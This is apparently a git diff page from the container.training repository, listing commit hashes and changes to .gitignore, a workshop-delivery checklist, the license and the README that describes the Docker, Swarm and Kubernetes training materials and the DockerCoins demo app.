|
a12a38a7a9 | ||
|
|
2c3a442a4c | ||
|
|
25d560cf46 | ||
|
|
c3324cf64c | ||
|
|
053bbe7028 | ||
|
|
74f980437f | ||
|
|
5ef96a29ac | ||
|
|
f261e7aa96 | ||
|
|
8e44e911ca | ||
|
|
6711ba06d9 | ||
|
|
fce69b6bb2 | ||
|
|
1183e2e4bf | ||
|
|
de3082e48f | ||
|
|
3acac34e4b | ||
|
|
f97bd2b357 | ||
|
|
3bac124921 | ||
|
|
ba44603d0f | ||
|
|
358f844c88 | ||
|
|
74bf2d742c | ||
|
|
acba3d5467 | ||
|
|
cfc066c8ea | ||
|
|
4f69f19866 | ||
|
|
c508f88af2 | ||
|
|
9757fdb42f | ||
|
|
24d57f535b | ||
|
|
e42dfc0726 | ||
|
|
3f54f23535 | ||
|
|
c7198b3538 | ||
|
|
827d10dd49 | ||
|
|
1b7a072f25 | ||
|
|
af1347ca17 | ||
|
|
f741cf5b23 | ||
|
|
eb1b3c8729 | ||
|
|
40e4678a45 | ||
|
|
d3c0a60de9 | ||
|
|
83bba80f3b | ||
|
|
44e0cfb878 | ||
|
|
a58e21e313 | ||
|
|
1131635006 | ||
|
|
c6e477e6ab | ||
|
|
18a81120bc | ||
|
|
17cd67f4d0 | ||
|
|
38a40d56a0 | ||
|
|
96fd2e26fd | ||
|
|
581bbc847d | ||
|
|
da7cbc41d2 | ||
|
|
282e22acb9 | ||
|
|
9374eebdf6 | ||
|
|
dcd5c5b39a | ||
|
|
974f8ee244 | ||
|
|
8212aa378a | ||
|
|
403d4c6408 | ||
|
|
142681fa27 | ||
|
|
69c9141817 | ||
|
|
9ed88e7608 | ||
|
|
b216f4d90b | ||
|
|
26ee07d8ba | ||
|
|
a8e5b02fb4 | ||
|
|
80a8912a53 | ||
|
|
1ba6797f25 | ||
|
|
11a2167dea | ||
|
|
af4eeb6e6b | ||
|
|
ea6459e2bd | ||
|
|
2dfa5a9660 | ||
|
|
b86434fbd3 | ||
|
|
223525cc69 | ||
|
|
fd63c079c8 | ||
|
|
ebe4511c57 | ||
|
|
e1a81ef8f3 | ||
|
|
3382c83d6e | ||
|
|
a89430673f | ||
|
|
fcea6dbdb6 | ||
|
|
c744a7d168 | ||
|
|
0256dc8640 | ||
|
|
41819794d7 | ||
|
|
836903cb02 | ||
|
|
7f822d33b5 | ||
|
|
232fdbb1ff | ||
|
|
f3f6111622 | ||
|
|
a8378e7e7f | ||
|
|
eb3165096f | ||
|
|
90ca58cda8 | ||
|
|
5a81526387 | ||
|
|
8df073b8ac | ||
|
|
0f7356b002 | ||
|
|
0c2166fb5f | ||
|
|
d228222fa6 | ||
|
|
e4b7d3244e | ||
|
|
7d0e841a73 | ||
|
|
9859e441e1 | ||
|
|
e1c638439f | ||
|
|
253aaaad97 | ||
|
|
a249ccc12b | ||
|
|
22fb898267 | ||
|
|
e038797875 | ||
|
|
7b9f9e23c0 | ||
|
|
01d062a68f | ||
|
|
a66dfb5faf | ||
|
|
ac1480680a | ||
|
|
13a9b5ca00 | ||
|
|
0cdf6abf0b | ||
|
|
2071694983 | ||
|
|
12e2b18a6f | ||
|
|
28e128756d | ||
|
|
a15109a12c | ||
|
|
e500fb57e8 | ||
|
|
f1849092eb | ||
|
|
f1dbd7e8a6 | ||
|
|
d417f454dd | ||
|
|
d79718d834 | ||
|
|
de9c3a1550 | ||
|
|
90fc7a4ed3 | ||
|
|
09edbc24bc | ||
|
|
92f8701c37 | ||
|
|
c828888770 | ||
|
|
bb7728e7e7 | ||
|
|
5f544f9c78 | ||
|
|
5b6a7d1995 | ||
|
|
b21185dde7 | ||
|
|
deaee0dc82 | ||
|
|
4206346496 | ||
|
|
6658b632b3 | ||
|
|
d9be7160ef | ||
|
|
d56424a287 | ||
|
|
2d397c5cb8 | ||
|
|
08004caa5d | ||
|
|
522358a004 | ||
|
|
e00a6c36e3 | ||
|
|
4664497cbc | ||
|
|
6be424bde5 | ||
|
|
0903438242 | ||
|
|
b874b68e57 | ||
|
|
6af9385c5f | ||
|
|
29398ac33b | ||
|
|
7525739b24 | ||
|
|
50ff71f3f3 | ||
|
|
70a9215c9d | ||
|
|
9c1a5d9a7d | ||
|
|
9a9b4a6892 | ||
|
|
e5502c724e | ||
|
|
125878e280 | ||
|
|
b4c1498ca1 | ||
|
|
88d534a7f2 | ||
|
|
6ce4ed0937 | ||
|
|
1b9ba62dc8 | ||
|
|
f3639e6200 | ||
|
|
1fe56cf401 | ||
|
|
a3add3d816 | ||
|
|
2807de2123 | ||
|
|
5029b956d2 | ||
|
|
815aaefad9 | ||
|
|
7ea740f647 | ||
|
|
eaf25e5b36 | ||
|
|
3b336a9127 | ||
|
|
cc4d1fd1c7 | ||
|
|
17ec6441a0 | ||
|
|
a1b107cecb | ||
|
|
2e06bc2352 | ||
|
|
af0a239bd9 | ||
|
|
92939ca3f2 | ||
|
|
aca51901a1 | ||
|
|
8d15dba26d | ||
|
|
cdca5655fc | ||
|
|
c778fc84ed | ||
|
|
7f72ee1296 | ||
|
|
1981ac0b93 | ||
|
|
a8f2fb4586 | ||
|
|
a69d3d0828 | ||
|
|
40760f9e98 | ||
|
|
b64b16dd67 | ||
|
|
8c2c9bc5df | ||
|
|
3a21cbc72b | ||
|
|
5438fca35a | ||
|
|
a09521ceb1 | ||
|
|
0d6501a926 | ||
|
|
c25f7a119b | ||
|
|
1958c85a96 | ||
|
|
a7ba4418c6 | ||
|
|
d6fcbb85e8 | ||
|
|
278fbf285a | ||
|
|
ca828343e4 | ||
|
|
5c663f9e09 | ||
|
|
9debd76816 | ||
|
|
848679829d | ||
|
|
6727007754 | ||
|
|
03a563c172 | ||
|
|
cfbd54bebf | ||
|
|
7f1e9db0fa | ||
|
|
1367a30a11 | ||
|
|
31b234ee3a | ||
|
|
57dd5e295e | ||
|
|
c188923f1a | ||
|
|
7a8716d38b | ||
|
|
2e77c13297 | ||
|
|
d5279d881d | ||
|
|
34e9cc1944 | ||
|
|
2a7498e30e | ||
|
|
4689d09e1f | ||
|
|
b818a38307 | ||
|
|
7e5d869472 | ||
|
|
3eaf31fd48 | ||
|
|
fe5e22f5ae | ||
|
|
61da583080 | ||
|
|
94dfe1a0cd | ||
|
|
412dbadafd | ||
|
|
8c5e4e0b09 | ||
|
|
2ac6072d80 | ||
|
|
ef4591c4fc | ||
|
|
22dfbab09b | ||
|
|
37f595c480 | ||
|
|
1fc951037d | ||
|
|
affd46dd88 | ||
|
|
cfaff3df04 | ||
|
|
ce2451971d | ||
|
|
8cf5d0efbd | ||
|
|
f61d61223d | ||
|
|
6b6eb50f9a | ||
|
|
89ab66335f | ||
|
|
5bc4e95515 | ||
|
|
893f05e401 | ||
|
|
4abc8ce34c | ||
|
|
34d2c610bf | ||
|
|
1492a8a0bc | ||
|
|
388d616048 | ||
|
|
28589f5a83 | ||
|
|
e7a80f7bfb | ||
|
|
ea47e0ac05 | ||
|
|
09d204038f | ||
|
|
47cb0afac2 | ||
|
|
8e2e7f44d3 | ||
|
|
8c7702deda | ||
|
|
bdc1ca01cd | ||
|
|
dca58d6663 | ||
|
|
a0cf4b97c0 | ||
|
|
a1c239260f | ||
|
|
a8a2cf54a5 | ||
|
|
d5ba80da55 | ||
|
|
3f2da04763 | ||
|
|
e092f50645 | ||
|
|
7f698bd690 | ||
|
|
7fe04b9944 | ||
|
|
2671714df3 | ||
|
|
630e275d99 | ||
|
|
614f10432e | ||
|
|
223b5e152b | ||
|
|
ec55cd2465 | ||
|
|
c59510f921 | ||
|
|
0f5f481213 | ||
|
|
b40fa45fd3 | ||
|
|
8faaf35da0 | ||
|
|
ce0f79af16 | ||
|
|
faa420f9fd | ||
|
|
aab519177d | ||
|
|
5116ad7c44 | ||
|
|
7305e911e5 | ||
|
|
b2f670acf6 | ||
|
|
dc040aa693 | ||
|
|
9b7a8494b0 | ||
|
|
ae6c1bb8eb | ||
|
|
a9a4f0ea07 | ||
|
|
68af5940e3 | ||
|
|
9df5313da4 | ||
|
|
ba3f00e64e | ||
|
|
4d7a6d5c70 | ||
|
|
aef833c3f5 | ||
|
|
6f58fee29b | ||
|
|
dda09ddbcb | ||
|
|
8b13fe6eb4 | ||
|
|
21f345a96a | ||
|
|
eaa4dc63bf | ||
|
|
af5ea2188b | ||
|
|
7f23a4c964 | ||
|
|
345e04c956 | ||
|
|
2a138102fc | ||
|
|
ef5e8f00f8 | ||
|
|
badb73a413 | ||
|
|
2aced95c86 | ||
|
|
720989e829 | ||
|
|
718031565e | ||
|
|
ec7b46b779 | ||
|
|
270c36b29a | ||
|
|
bc2eb53bb2 | ||
|
|
afe7b8523c | ||
|
|
a7743a4314 | ||
|
|
ba74fdc841 | ||
|
|
41c047e12a | ||
|
|
f4fc055405 | ||
|
|
2eb6fcfbf5 | ||
|
|
c665e1a2d6 | ||
|
|
bb7cdafe47 | ||
|
|
95fcfadb17 | ||
|
|
1ef47531c8 | ||
|
|
9589b641b6 | ||
|
|
63463bda64 | ||
|
|
b642412639 | ||
|
|
21f9b73cb4 | ||
|
|
b73e5432f3 | ||
|
|
de5cc9b0bf | ||
|
|
08b38127d3 | ||
|
|
383804b7f1 | ||
|
|
20bf80910e | ||
|
|
29a2014745 | ||
|
|
40f6ee236f | ||
|
|
5551cbd11f | ||
|
|
9e84a05325 | ||
|
|
558e990907 | ||
|
|
c2e88bb343 | ||
|
|
b7582397fe | ||
|
|
3e7b8615ab | ||
|
|
6f5d8c5372 | ||
|
|
c116d75408 | ||
|
|
bb4ee4e77d | ||
|
|
fc0e46988c | ||
|
|
c71b93c3a7 | ||
|
|
2c6b79c17d | ||
|
|
f264838ec5 | ||
|
|
54e7d10226 | ||
|
|
f8d3246005 | ||
|
|
7856e8c5f2 | ||
|
|
69bafe332f | ||
|
|
e2b24a20d2 | ||
|
|
d2d1771fd3 | ||
|
|
6c5e3eb3f3 | ||
|
|
d99dbd5878 | ||
|
|
6d4894458a | ||
|
|
bc367a1297 | ||
|
|
31d1074ee0 | ||
|
|
cd18a87b8c | ||
|
|
8279a3bce9 | ||
|
|
93524898cc | ||
|
|
e9319060f6 | ||
|
|
4322478a4a | ||
|
|
00262c767e | ||
|
|
c8030e1500 | ||
|
|
3717b90444 | ||
|
|
d003bdb765 | ||
|
|
8b246ac334 | ||
|
|
9df543a6bb | ||
|
|
77befc1092 | ||
|
|
4417771315 | ||
|
|
04fa6ec1d8 | ||
|
|
5e8bdcb1f6 | ||
|
|
07d99763d3 | ||
|
|
87a2051b24 | ||
|
|
0eddc876f1 | ||
|
|
1a67a1397b | ||
|
|
dc6bf9d0cf | ||
|
|
84f8bf007e | ||
|
|
6a2a66c165 | ||
|
|
f491d559e3 | ||
|
|
5d9bdc303c | ||
|
|
f7f0ecddd4 | ||
|
|
f0f03e2440 | ||
|
|
1f78264e9f | ||
|
|
2aad5319f9 | ||
|
|
479b858398 | ||
|
|
34b8bfd1b2 | ||
|
|
408036b09c | ||
|
|
a45ec1cb84 | ||
|
|
8decf1852f | ||
|
|
350fac21f6 | ||
|
|
cedd386eee | ||
|
|
5751765d66 | ||
|
|
7293c071bd | ||
|
|
98cf8f4f04 | ||
|
|
c61ccd1c27 | ||
|
|
6b3d0efa56 | ||
|
|
164578f1c8 | ||
|
|
938fe956cf | ||
|
|
b44d402c1d | ||
|
|
fbaa511813 | ||
|
|
f000594c62 | ||
|
|
71ba94063e | ||
|
|
b025a8c966 | ||
|
|
c36aab132b | ||
|
|
1e7a47ed37 | ||
|
|
87f544774e | ||
|
|
db9ee5f03a | ||
|
|
d0f5d69157 | ||
|
|
742c7a78bc | ||
|
|
918d3a6c23 | ||
|
|
1f9b304eec | ||
|
|
f479591f9c | ||
|
|
241452bab4 | ||
|
|
5a58b17bb5 | ||
|
|
2f4dfe7b6f | ||
|
|
dad3d434b8 | ||
|
|
3534d81860 | ||
|
|
1c4d1d736e | ||
|
|
c00bbb77c4 | ||
|
|
0b24076086 | ||
|
|
c1a156337f | ||
|
|
078023058b | ||
|
|
c1ecd16a8d | ||
|
|
51cf4a076a | ||
|
|
7cf622e06a | ||
|
|
14b2d54e43 | ||
|
|
3c9353815b | ||
|
|
a44d3618bc | ||
|
|
5466319407 | ||
|
|
1d5f4330c0 | ||
|
|
9e5bab1a76 | ||
|
|
c67675f900 | ||
|
|
4c18583a8e | ||
|
|
d02d71270f | ||
|
|
deb304026b | ||
|
|
03561f38d8 | ||
|
|
4965b205a7 | ||
|
|
0d610081bd | ||
|
|
24c2f9f18e | ||
|
|
3fc2d4c266 | ||
|
|
0c175615a5 | ||
|
|
3198bb0d1f | ||
|
|
030d100d70 | ||
|
|
4747860226 | ||
|
|
b243094d66 | ||
|
|
1fec8f506a | ||
|
|
04362a3b52 | ||
|
|
f0597c43b3 | ||
|
|
b11e54cc43 | ||
|
|
01d9923ca4 | ||
|
|
0f3660dc95 | ||
|
|
60a75647d2 | ||
|
|
f46856ff63 | ||
|
|
0508d24046 | ||
|
|
1d46898737 | ||
|
|
5b95d6ee7f | ||
|
|
bb88d11344 | ||
|
|
7262effec4 | ||
|
|
2c08439de4 | ||
|
|
6543ffc5b9 | ||
|
|
681754fc1b | ||
|
|
603bda8166 | ||
|
|
a4a37368e5 | ||
|
|
30fd53a3e1 | ||
|
|
40eab78186 | ||
|
|
68e0c8fca7 | ||
|
|
af261de9a4 | ||
|
|
2a176edfb4 | ||
|
|
f56262bee0 | ||
|
|
488fa1c981 | ||
|
|
f63107ce15 | ||
|
|
68fc895017 | ||
|
|
5c0b83cd1b | ||
|
|
452b5c0880 | ||
|
|
42549d8c19 | ||
|
|
9a5e9c9ea0 | ||
|
|
1ea7141d95 | ||
|
|
c0fbf4aec4 | ||
|
|
48b79a18a4 | ||
|
|
2c5724a5fe | ||
|
|
80d79c4d31 | ||
|
|
ff0c868c27 | ||
|
|
35a8c81b39 | ||
|
|
fe83ce99f2 | ||
|
|
d1e6248ded | ||
|
|
7e57b23234 | ||
|
|
5c102d594f | ||
|
|
d73f5232ff |
25
.gitignore
vendored
25
.gitignore
vendored
@@ -1,9 +1,24 @@
|
||||
*.pyc
|
||||
*.swp
|
||||
*~
|
||||
prepare-vms/ips.txt
|
||||
prepare-vms/ips.html
|
||||
prepare-vms/ips.pdf
|
||||
prepare-vms/settings.yaml
|
||||
prepare-vms/tags
|
||||
docs/*.yml.html
|
||||
prepare-vms/infra
|
||||
prepare-vms/www
|
||||
slides/*.yml.html
|
||||
slides/autopilot/state.yaml
|
||||
slides/index.html
|
||||
slides/past.html
|
||||
slides/slides.zip
|
||||
node_modules
|
||||
|
||||
### macOS ###
|
||||
# General
|
||||
.DS_Store
|
||||
.AppleDouble
|
||||
.LSOverride
|
||||
|
||||
### Windows ###
|
||||
# Windows thumbnail cache files
|
||||
Thumbs.db
|
||||
ehthumbs.db
|
||||
ehthumbs_vista.db
|
||||
|
||||
1
.gitpod.yml
Normal file
1
.gitpod.yml
Normal file
@@ -0,0 +1 @@
|
||||
image: jpetazzo/shpod
|
||||
24
CHECKLIST.md
Normal file
24
CHECKLIST.md
Normal file
@@ -0,0 +1,24 @@
|
||||
Checklist to use when delivering a workshop
|
||||
Authored by Jérôme; additions by Bridget
|
||||
|
||||
- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
|
||||
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
|
||||
- [ ] Push local branch to GitHub and merge into main repo
|
||||
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
|
||||
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
|
||||
- [ ] Update the slides that says which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
|
||||
- [ ] Update the version of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
|
||||
- [ ] (optional) Create chatroom
|
||||
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy
|
||||
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
|
||||
- [ ] How many VMs do we need? Check with event organizers ahead of time
|
||||
- [ ] Provision VMs (slightly more than we think we'll need)
|
||||
- [ ] Change password on presenter's VMs (to forestall any hijinx)
|
||||
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
|
||||
- [ ] Print cards
|
||||
- [ ] Cut cards
|
||||
- [ ] Last-minute merge from master
|
||||
- [ ] Check that all looks good
|
||||
- [ ] DELIVER!
|
||||
- [ ] Shut down VMs
|
||||
- [ ] Update index.html to remove chat link and move session to past things
|
||||
19
LICENSE
19
LICENSE
@@ -1,13 +1,12 @@
|
||||
Copyright 2015 Jérôme Petazzoni
|
||||
|
||||
Licensed under the Apache License, Version 2.0 (the "License");
|
||||
you may not use this file except in compliance with the License.
|
||||
You may obtain a copy of the License at
|
||||
The code in this repository is licensed under the Apache License
|
||||
Version 2.0. You may obtain a copy of this license at:
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing, software
|
||||
distributed under the License is distributed on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
See the License for the specific language governing permissions and
|
||||
limitations under the License.
|
||||
The instructions and slides in this repository (e.g. the files
|
||||
with extension .md and .yml in the "slides" subdirectory) are
|
||||
under the Creative Commons Attribution 4.0 International Public
|
||||
License. You may obtain a copy of this license at:
|
||||
|
||||
https://creativecommons.org/licenses/by/4.0/legalcode
|
||||
|
||||
|
||||
276
README.md
276
README.md
@@ -1,12 +1,106 @@
|
||||
# Docker Orchestration Workshop
|
||||
# Container Training
|
||||
|
||||
This is the material (slides, scripts, demo app, and other
|
||||
code samples) for the "Docker orchestration workshop"
|
||||
written and delivered by Jérôme Petazzoni (and lots of others)
|
||||
non-stop since June 2015.
|
||||
This repository (formerly known as `orchestration-workshop`)
|
||||
contains materials (slides, scripts, demo app, and other
|
||||
code samples) used for various workshops, tutorials, and
|
||||
training sessions around the themes of Docker, containers,
|
||||
and orchestration.
|
||||
|
||||
For the moment, it includes:
|
||||
|
||||
- Introduction to Docker and Containers,
|
||||
- Container Orchestration with Docker Swarm,
|
||||
- Container Orchestration with Kubernetes.
|
||||
|
||||
These materials have been designed around the following
|
||||
principles:
|
||||
|
||||
- they assume very little prior knowledge of Docker,
|
||||
containers, or a particular programming language;
|
||||
- they can be used in a classroom setup (with an
|
||||
instructor), or self-paced at home;
|
||||
- they are hands-on, meaning that they contain lots
|
||||
of examples and exercises that you can easily
|
||||
reproduce;
|
||||
- they progressively introduce concepts in chapters
|
||||
that build on top of each other.
|
||||
|
||||
If you're looking for the materials, you can stop reading
|
||||
right now, and hop to http://container.training/, which
|
||||
hosts all the slides decks available.
|
||||
|
||||
The rest of this document explains how this repository
|
||||
is structured, and how to use it to deliver (or create)
|
||||
your own tutorials.
|
||||
|
||||
|
||||
## Content
|
||||
## Why a single repository?
|
||||
|
||||
All these materials have been gathered in a single repository
|
||||
because they have a few things in common:
|
||||
|
||||
- some [shared slides](slides/shared/) that are re-used
|
||||
(and updated) identically between different decks;
|
||||
- a [build system](slides/) generating HTML slides from
|
||||
Markdown source files;
|
||||
- a [semi-automated test harness](slides/autopilot/) to check
|
||||
that the exercises and examples provided work properly;
|
||||
- a [PhantomJS script](slides/slidechecker.js) to check
|
||||
that the slides look good and don't have formatting issues;
|
||||
- [deployment scripts](prepare-vms/) to start training
|
||||
VMs in bulk;
|
||||
- a fancy pipeline powered by
|
||||
[Netlify](https://www.netlify.com/) and continuously
|
||||
deploying `master` to http://container.training/.
|
||||
|
||||
|
||||
## What are the different courses available?
|
||||
|
||||
**Introduction to Docker** is derived from the first
|
||||
"Docker Fundamentals" training materials. For more information,
|
||||
see [jpetazzo/intro-to-docker](https://github.com/jpetazzo/intro-to-docker).
|
||||
The version in this repository has been adapted to the Markdown
|
||||
publishing pipeline. It is still maintained, but only receives
|
||||
minor updates once in a while.
|
||||
|
||||
**Container Orchestration with Docker Swarm** (formerly
|
||||
known as "Orchestration Workshop") is a workshop created by Jérôme
|
||||
Petazzoni in June 2015. Since then, it has been continuously updated
|
||||
and improved, and received contributions from many others authors.
|
||||
It is actively maintained.
|
||||
|
||||
**Container Orchestration with Kubernetes** was created by
|
||||
Jérôme Petazzoni in October 2017, with help and feedback from
|
||||
a few other contributors. It is actively maintained.
|
||||
|
||||
|
||||
## Repository structure
|
||||
|
||||
- [bin](bin/)
|
||||
- A few helper scripts that you can safely ignore for now.
|
||||
- [dockercoins](dockercoins/)
|
||||
- The demo app used throughout the orchestration workshops.
|
||||
- [efk](efk/), [elk](elk/), [prom](prom/), [snap](snap/):
|
||||
- Logging and metrics stacks used in the later parts of
|
||||
the orchestration workshops.
|
||||
- [prepare-local](prepare-local/), [prepare-machine](prepare-machine/):
|
||||
- Contributed scripts to automate the creation of local environments.
|
||||
These could use some help to test/check that they work.
|
||||
- [prepare-vms](prepare-vms/):
|
||||
- Scripts to automate the creation of AWS instances for students.
|
||||
These are routinely used and actively maintained.
|
||||
- [slides](slides/):
|
||||
- All the slides! They are assembled from Markdown files with
|
||||
a custom Python script, and then rendered using [gnab/remark](
|
||||
https://github.com/gnab/remark). Check this directory for more details.
|
||||
- [stacks](stacks/):
|
||||
- A handful of Compose files (version 3) allowing to easily
|
||||
deploy complex application stacks.
|
||||
|
||||
|
||||
## Course structure
|
||||
|
||||
(This applies only for the orchestration workshops.)
|
||||
|
||||
The workshop introduces a demo app, "DockerCoins," built
|
||||
around a micro-services architecture. First, we run it
|
||||
@@ -31,104 +125,10 @@ to a YAML manifest. This allows to re-use content
|
||||
between different workshops very easily.
|
||||
|
||||
|
||||
## Quick start (or, "I want to try it!")
|
||||
### DockerCoins
|
||||
|
||||
This workshop is designed to be *hands on*, i.e. to give you a step-by-step
|
||||
guide where you will build your own Docker cluster, and use it to deploy
|
||||
a sample application.
|
||||
|
||||
The easiest way to follow the workshop is to attend it when it is delivered
|
||||
by an instructor. In that case, the instructor will generally give you
|
||||
credentials (IP addresses, login, password) to connect to your own cluster
|
||||
of virtual machines; and the [slides](http://jpetazzo.github.io/orchestration-workshop)
|
||||
assume that you have your own cluster indeed.
|
||||
|
||||
If you want to follow the workshop on your own, and want to have your
|
||||
own cluster, we have multiple solutions for you!
|
||||
|
||||
|
||||
### Using [play-with-docker](http://play-with-docker.com/)
|
||||
|
||||
This method is very easy to get started: you don't need any extra account
|
||||
or resources! It works only for the SwarmKit version of the workshop, though.
|
||||
|
||||
To get started, go to [play-with-docker](http://play-with-docker.com/), and
|
||||
click on _ADD NEW INSTANCE_ five times. You will get five "docker-in-docker"
|
||||
containers, all on a private network. These are your five nodes for the workshop!
|
||||
|
||||
When the instructions in the slides tell you to "SSH on node X", just go to
|
||||
the tab corresponding to that node.
|
||||
|
||||
The nodes are not directly reachable from outside; so when the slides tell
|
||||
you to "connect to the IP address of your node on port XYZ" you will have
|
||||
to use a different method: click on the port number that should appear on
|
||||
top of the play-with-docker window. This only works for HTTP services,
|
||||
though.
|
||||
|
||||
Note that the instances provided by Play-With-Docker have a short lifespan
|
||||
(a few hours only), so if you want to do the workshop over multiple sessions,
|
||||
you will have to start over each time ... Or create your own cluster with
|
||||
one of the methods described below.
|
||||
|
||||
|
||||
### Using Docker Machine to create your own cluster
|
||||
|
||||
This method requires a bit more work to get started, but you get a permanent
|
||||
cluster, with less limitations.
|
||||
|
||||
You will need Docker Machine (if you have Docker Mac, Docker Windows, or
|
||||
the Docker Toolbox, you're all set already). You will also need:
|
||||
|
||||
- credentials for a cloud provider (e.g. API keys or tokens),
|
||||
- or a local install of VirtualBox or VMware (or anything supported
|
||||
by Docker Machine).
|
||||
|
||||
Full instructions are in the [prepare-machine](prepare-machine) subdirectory.
|
||||
|
||||
|
||||
### Using our scripts to mass-create a bunch of clusters
|
||||
|
||||
Since we often deliver the workshop during conferences or similar events,
|
||||
we have scripts to automate the creation of a bunch of clusters using
|
||||
AWS EC2. If you want to create multiple clusters and have EC2 credits,
|
||||
check the [prepare-vms](prepare-vms) directory for more information.
|
||||
|
||||
|
||||
## How This Repo is Organized
|
||||
|
||||
- **dockercoins**
|
||||
- Sample App: compose files and source code for the dockercoins sample apps
|
||||
used throughout the workshop
|
||||
- **docs**
|
||||
- Slide Deck: presentation slide deck, works out-of-box with GitHub Pages,
|
||||
uses https://remarkjs.com
|
||||
- **prepare-local**
|
||||
- untested scripts for automating the creation of local virtualbox VM's
|
||||
(could use your help validating)
|
||||
- **prepare-machine**
|
||||
- instructions explaining how to use Docker Machine to create VMs
|
||||
- **prepare-vms**
|
||||
- scripts for automating the creation of AWS instances for students
|
||||
|
||||
|
||||
## Slide Deck
|
||||
|
||||
- The slides are in the `docs` directory.
|
||||
- For each slide deck, there is a `.yml` file referencing `.md` files.
|
||||
- The `.md` files contain Markdown snippets.
|
||||
- When you run `build.sh once`, it will "compile" all the `.yml` files
|
||||
into `.yml.html` files that you can open in your browser.
|
||||
- You can also run `build.sh forever`, which will watch the directory
|
||||
and rebuild slides automatically when files are modified.
|
||||
- If needed, you can fine-tune `workshop.css` and `workshop.html`
|
||||
(respectively the CSS style used, and the boilerplate template).
|
||||
- The slides use https://remarkjs.com to render Markdown into HTML in
|
||||
a web browser.
|
||||
|
||||
|
||||
## Sample App: Dockercoins!
|
||||
|
||||
The sample app is in the `dockercoins` directory. It's used during all chapters
|
||||
The sample app is in the `dockercoins` directory.
|
||||
It's used during all chapters
|
||||
for explaining different concepts of orchestration.
|
||||
|
||||
To see it in action:
|
||||
@@ -138,13 +138,18 @@ To see it in action:
|
||||
- the web UI will be available on port 8000
|
||||
|
||||
|
||||
*If you just want to run the workshop for yourself, you can stop reading
|
||||
here. If you want to deliver the workshop for others (i.e. if you
|
||||
want to become an instructor), keep reading!*
|
||||
|
||||
|
||||
## Running the Workshop
|
||||
|
||||
If you want to deliver one of these workshops yourself,
|
||||
this section is for you!
|
||||
|
||||
> *This section has been mostly contributed by
|
||||
> [Bret Fisher](https://twitter.com/bretfisher), who was
|
||||
> one of the first persons to have the bravery of delivering
|
||||
> this workshop without me. Thanks Bret! 🍻
|
||||
>
|
||||
> Jérôme.*
|
||||
|
||||
|
||||
### General timeline of planning a workshop
|
||||
|
||||
@@ -152,7 +157,7 @@ want to become an instructor), keep reading!*
|
||||
understand the different `dockercoins` repo's and the steps we go through to
|
||||
get to a full Swarm Mode cluster of many containers. You'll update the first
|
||||
few slides and last slide at a minimum, with your info.
|
||||
- Your docs directory can use GitHub Pages.
|
||||
- ~~Your docs directory can use GitHub Pages.~~
|
||||
- This workshop expects 5 servers per student. You can get away with as little
|
||||
as 2 servers per student, but you'll need to change the slide deck to
|
||||
accommodate. More servers = more fun.
|
||||
@@ -185,6 +190,7 @@ want to become an instructor), keep reading!*
|
||||
- Remember you'll need to print the "cards" for students, so you'll need to
|
||||
create instances while you have a way to print them.
|
||||
|
||||
|
||||
### Things That Could Go Wrong
|
||||
|
||||
- Creating AWS instances ahead of time, and you hit its limits in region and
|
||||
@@ -193,11 +199,12 @@ want to become an instructor), keep reading!*
|
||||
locked-down computer, host firewall, etc.
|
||||
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
|
||||
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
|
||||
prevent you from loosing your place if you get disconnected from servers.
|
||||
prevent you from losing your place if you get disconnected from servers.
|
||||
https://tmux.github.io
|
||||
- Forget to print "cards" and cut them up for handing out IP's.
|
||||
- Forget to have fun and focus on your students!
|
||||
|
||||
|
||||
### Creating the VMs
|
||||
|
||||
`prepare-vms/workshopctl` is the script that gets you most of what you need for
|
||||
@@ -205,6 +212,7 @@ setting up instances. See
|
||||
[prepare-vms/README.md](prepare-vms)
|
||||
for all the info on tools and scripts.
|
||||
|
||||
|
||||
### Content for Different Workshop Durations
|
||||
|
||||
With all the slides, this workshop is a full day long. If you need to deliver
|
||||
@@ -213,6 +221,7 @@ can replace `---` with `???` which will hide slides. Or leave them there and
|
||||
add something like `(EXTRA CREDIT)` to title so students can still view the
|
||||
content but you also know to skip during presentation.
|
||||
|
||||
|
||||
#### 3 Hour Version
|
||||
|
||||
- Limit time on debug tools, maybe skip a few. *"Chapter 1:
|
||||
@@ -224,6 +233,7 @@ content but you also know to skip during presentation.
|
||||
- Mention what DAB's are, but make this part optional in case you run out
|
||||
of time
|
||||
|
||||
|
||||
#### 2 Hour Version
|
||||
|
||||
- Skip all the above, and:
|
||||
@@ -237,6 +247,17 @@ content but you also know to skip during presentation.
|
||||
- Last 15-30 minutes is for stateful services, DAB files, and questions.
|
||||
|
||||
|
||||
### Pre-built images
|
||||
|
||||
There are pre-built images for the 4 components of the DockerCoins demo app: `dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`, and `dockercoins/worker:v0.1`. They correspond to the code in this repository.
|
||||
|
||||
There are also three variants, for demo purposes:
|
||||
|
||||
- `dockercoins/rng:v0.2` is broken (the server won't even start),
|
||||
- `dockercoins/webui:v0.2` has bigger font on the Y axis and a green graph (instead of blue),
|
||||
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
|
||||
|
||||
|
||||
## Past events
|
||||
|
||||
Since its inception, this workshop has been delivered dozens of times,
|
||||
@@ -268,13 +289,34 @@ If there is a bug and you can't fix it, but you can
|
||||
reproduce it: submit an issue explaining how to reproduce.
|
||||
|
||||
